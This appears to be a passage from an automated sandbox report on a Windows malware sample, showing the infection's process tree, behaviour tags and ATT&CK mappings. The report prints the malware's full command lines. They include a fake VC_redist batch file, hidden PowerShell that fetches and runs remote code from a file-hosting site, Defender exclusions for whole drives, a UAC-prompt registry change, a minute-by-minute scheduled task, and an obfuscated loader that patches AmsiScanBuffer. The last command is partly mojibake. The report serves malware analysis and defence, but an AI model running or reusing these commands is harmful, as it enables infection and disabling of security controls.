PID 4668 wrote to memory of 1632	4668	dllhost.exe	29
PID 4668 wrote to memory of 1712	4668	dllhost.exe	30
PID 4668 wrote to memory of 1744	4668	dllhost.exe	31
PID 4668 wrote to memory of 1820	4668	dllhost.exe	32
PID 4668 wrote to memory of 1948	4668	dllhost.exe	33
PID 4668 wrote to memory of 1960	4668	dllhost.exe	34

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:888
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b6bf4757-b5d5-4657-b9af-57cc52bda2d7}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4668

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1144
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:BYxITSJgVUCd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OQhtHJPpToNjvv,[Parameter(Position=1)][Type]$AFhQLkIedi)$aOXQrXhFaPH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+'ted'+'D'+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+'e'+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e','Cla'+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$aOXQrXhFaPH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$OQhtHJPpToNjvv).SetImplementationFlags('R'+[Char](117)+''+'n'+'time'+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'ged');$aOXQrXhFaPH.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+'N'+''+'e'+'w'+[Char](83)+''+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+'r'+'t'+'u'+[Char](97)+'l',$AFhQLkIedi,$OQhtHJPpToNjvv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me,'+'M'+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $aOXQrXhFaPH.CreateType();}$ZQIrXbTTIGqKB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+'W'+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$oMevXYQUvmRWCU=$ZQIrXbTTIGqKB.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZNLqRlVHXZYfcRuKRIa=BYxITSJgVUCd @([String])([IntPtr]);$gTIqHnHwVCQTrkHzdlxiRk=BYxITSJgVUCd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EhPfNcBIlHl=$ZQIrXbTTIGqKB.GetMethod(''+'G'+'etMod'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+'32'+[Char](46)+'d'+[Char](108)+'l')));$jlkYgJasaIdNbg=$oMevXYQUvmRWCU.Invoke($Null,@([Object]$EhPfNcBIlHl,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+''+'b'+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$TyocFEykjCvutDOFS=$oMevXYQUvmRWCU.Invoke($Null,@([Object]$EhPfNcBIlHl,[Object]('Vi'+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+'r'+'o'+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$PVCZddX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jlkYgJasaIdNbg,$ZNLqRlVHXZYfcRuKRIa).Invoke(''+[Char](97)+'ms'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$LRxbtWjUSUgORYroA=$oMevXYQUvmRWCU.Invoke($Null,@([Object]$PVCZddX,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+'f'+''+'e'+'r')));$uHtkjkXvwG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TyocFEykjCvutDOFS,$gTIqHnHwVCQTrkHzdlxiRk).Invoke($LRxbtWjUSUgORYroA,[uint32]8,4,[ref]$uHtkjkXvwG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LRxbtWjUSUgORYroA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TyocFEykjCvutDOFS,$gTIqHnHwVCQTrkHzdlxiRk).Invoke($LRxbtWjUSUgORYroA,[uint32]8,0x20,[ref]$uHtkjkXvwG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'s'+'vs'+'t'+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4736
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
  2⤵
  - Executes dropped EXE
  PID:4028
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
  2⤵
  - Executes dropped EXE
  PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1516
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1192

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2368

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2712

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2320

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3472

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3724
- - C:\Windows\system32\chcp.com
    chcp.com 437
    3⤵
    PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c type tmp
    3⤵
    PID:824
- - C:\Windows\system32\find.exe
    fInd
    3⤵
    PID:2964
- - C:\Windows\system32\find.exe
    find
    3⤵
    PID:2304
- - C:\Windows\system32\findstr.exe
    fiNdstr /L /I set C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
    3⤵
    PID:4832
- - C:\Windows\system32\findstr.exe
    fiNdstr /L /I goto C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
    3⤵
    PID:2552
- - C:\Windows\system32\findstr.exe
    fiNdstr /L /I echo C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
    3⤵
    PID:3572
- - C:\Windows\system32\findstr.exe
    fiNdstr /L /I pause C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
    3⤵
    PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c type tmp
    3⤵
    PID:3780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD
      4⤵
      UAC bypass
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4580
  - - C:\ProgramData\FMyUS.eXe
      "C:\ProgramData\FMyUS.eXe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2260
    - - C:\Users\Admin\AppData\Local\Temp\VjhvVGIe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VjhvVGIe.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
  - - C:\ProgramData\svOrbEl0.exe
      "C:\ProgramData\svOrbEl0.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      PID:2548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4292
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5064
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2480
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4004
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1428
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3976
  - - C:\ProgramData\1ZRs6.EXe
      "C:\ProgramData\1ZRs6.EXe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol | find ":\"
    3⤵
    PID:3644
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:1576
  - - C:\Windows\system32\find.exe
      find ":\"
      4⤵
      PID:4240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath C:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath F:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath E:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += 'l';$url += 'l';$url += 'l';$url += 'l';$url += 't';$url += 'm';$url += '.';$url += 'f';$url += 'M';$url += '2';$url += 'G';$url += 'z';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; InvokΦÇ╗ΦÇ╗Φ▒åσ╛╖:~13,1Φë▓ΘÑ┐σàïΘÑ┐:~26,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~54,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~49,1%Θÿ┐τ╗┤Φë▓σ░ö:~10,1%Θÿ┐τ╗┤Φë▓σ░ö:~22,1%Θÿ┐τ╗┤Φë▓σ░ö:~14,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~51,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~8,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~39,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~60,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1Φ▒åσ╛╖Θÿ┐τ╗┤:~58,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~32,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~51,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~4,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~19,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~31,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1Φë▓ΘÑ┐σàïΘÑ┐:~48,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~4,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~22,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~54,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~18,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~54,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1Φ▒åσ╛╖Θÿ┐τ╗┤:~57,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~51,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~43,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~12,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~18,1ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~30,1%Θÿ┐τ╗┤Φë▓σ░ö:~52,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%Θÿ┐τ╗┤Φë▓σ░ö:~39,1%Θÿ┐τ╗┤Φë▓σ░ö:~42,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~9,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~19,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~23,1%Φë▓ΘÑ┐σàïΘÑ┐:~0,1%Φë▓ΘÑ┐σàïΘÑ┐:~30,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~39,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~48,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~33,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~51,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~18,1%Φë▓ΘÑ┐σàïΘÑ┐:~30,1%Θÿ┐τ╗┤Φë▓σ░ö:~37,1%Φë▓ΘÑ┐σàïΘÑ┐:~45,1%Φë▓ΘÑ┐σàïΘÑ┐:~10,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~7,1%Θÿ┐τ╗┤Φë▓σ░ö:~56,1Φë▓ΘÑ┐σàïΘÑ┐:~52,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~12,1%Φë▓ΘÑ┐σàïΘÑ┐:~10,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~28,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~51,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~30,1ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~21,1%Φë▓ΘÑ┐σàïΘÑ┐:~45,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~38,1%Φë▓ΘÑ┐σàïΘÑ┐:~10,1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3668

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3804

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4320

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4072

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3952

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3592

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3596

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:2832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:2112

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3136

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 13df4ddc6014be26bf06609172a59010 Jr9Oia1gf0ClXttUFp81pA.0.1.0.0.0
1⤵
- Sets service image path in registry
PID:416
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4388

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:664

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:1532

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

